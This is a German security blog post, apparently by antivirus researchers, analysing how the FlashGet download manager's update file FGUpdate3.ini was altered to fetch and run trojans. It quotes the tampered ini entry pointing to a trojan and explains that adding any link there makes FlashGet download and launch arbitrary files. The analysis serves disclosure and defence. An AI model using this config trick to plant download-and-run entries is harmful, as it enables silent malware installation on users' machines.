TrojanGet

Vor einigen Tagen erhielten wir die ersten E-Mails von Anwendern, auf deren Computern der Anti-Virus trojanische Programme im Verzeichnis des populären Download-Managers FlashGet gefunden hatte.

Eine Analyse des Problems ergab, dass die Anwender dieses Programms auf der ganzen Welt davon betroffen sind. Symptomatisch für eine Infizierung ist das Erscheinen von Dateien im System mit den Bezeichnungen inapp4.exe, inapp5.exe, inapp6.exe, die vom Kaspersky Anti-Virus als Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo, Trojan-Dowloader.Win32.Agent.kht erkannt werden.

Sonderbar war, dass neben diesen keine anderen trojanischen Programme gefunden wurden, über die die oben genannten ins System hätten eindringen können – mehr war einfach nicht zu finden. Einige der betroffenen Anwender hatten alle Patches für das Betriebssystem und den Browser installiert. Wie also waren die Schadprogramme auf die Computer gelangt?

Unsere Aufmerksamkeit richtete sich sofort auf den Ort, an dem die Trojaner saßen – das Verzeichnis von Flashget selbst. Wie sich zeigte, wies neben den Trojanern auch die Datei FGUpdate3.ini ein aktuelles Erstellungs-/Änderungsdatum auf (Unterschiede zu Originaldateien sind blau hervorgehoben):

[Add] fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx] [fgres1.ini] url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif] url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe] url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Merkwürdigerweise verwies der Link auf der – trojanischen – Datei inapp4.exe auf die echte FlashGet-Site, von der sich der Trojaner als appA.cab herunter lud.

Auf der Website von FlashGet gab es keinerlei Hinweise auf den Vorfall, aber in dem Anwenderforum des Programms fand sich eine Menge Einträge über Fälle von Infizierungen. Seitens der Hersteller nichts als Schweigen.

Den Informationen zufolge, die wir im Netz fanden, kam es bereits am 29. Februar zu der ersten Infizierung. Der letzte uns bekannte Fall datiert auf den 09. März.

Zehn Tage lang spielte ein legales Programm die Rolle eines Trojan-Downloaders, indem es die Installation und den Start von trojanischen Programmen im System des Anwenders realisierte, die auf der Seite des Herstellers platziert waren!
Zum gegenwärtigen Zeitpunkt sind die Trojaner von der Site entfernt und FGUpdate3.ini (die ebenfalls aus dem Netz geladen wird) wurde in ihren ursprünglichen Zustand zurück versetzt.

Unserer Meinung nach gibt es zwei Methoden, mittels derer FlashGet in einen Trojan-Downloader verwandelt werden kann. Die erste ist auch die offensichtlichste: Die Site des Herstellerunternehmens wurde gehackt und als Folge waren die Kriminellen in der Lage, die Standard-Konfigurationsdatei auszutauschen, die auf das trojanische Programm verweist, das ebenfalls dort platziert ist!

Warum sich die Hacker ausgerechnet diese Website ausgesucht haben, wissen wir nicht. Vermutlich aus Tarnungsgründen – ein Link auf die FlashGet-Site in der Konfig-Datei erweckt vermutlich kein Misstrauen. Wir wollten nun herausfinden, ob dieser Trick auch für den Download beliebiger anderer Dateien von beliebigen anderen Sites anwendbar ist.

Die Antwort lautet: ja.

Man muss der Datei FGUpdate3.ini lediglich den eigenen Link – worauf auch immer – hinzufügen, und die entsprechende Datei wird automatisch bei jedem Start von FlashGet auf dem Computer geladen und gestartet. Selbst wenn die Schaltfläche „Aktualisieren“ nicht angeklickt wird, erhält FlashGet die Informationen selbstständig aus der ini-Datei!

Die „Schwachstelle“ existiert in allen Versionen FlashGet 1.9.xx.

Obgleich das Problem der „gehackten“ FlashGet-Site aktuell beseitigt ist, bedeutet dies, dass die Schwachstelle für die Sicherheit des Anwenders bestehen bleibt. Denn jedes beliebige trojanische Programm kann die lokale ini-Datei von FlashGet verändern und sie so in einen Trojan-Downloader umwandeln.

Vielleicht lohnt es sich darüber nachzudenken, dass FlashGet normalerweise zu den „vertrauenswürdigen“ Anwendungen gehört, denen jegliche Netzaktivität und Anfragen an jegliche Websites erlaubt sind?

Zum gegenwärtigen Zeitpunkt gibt es keine offizielle Stellungnahme des chinesischen Entwicklers von FlashGet. Die tatsächlichen Gründe für die Vorkommnisse bleiben nach wie vor im Dunkeln und es gibt keine Garantie dafür, dass sich Derartiges nicht wiederholt.

Möge jeder seine eigenen Schlüsse daraus ziehen…

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.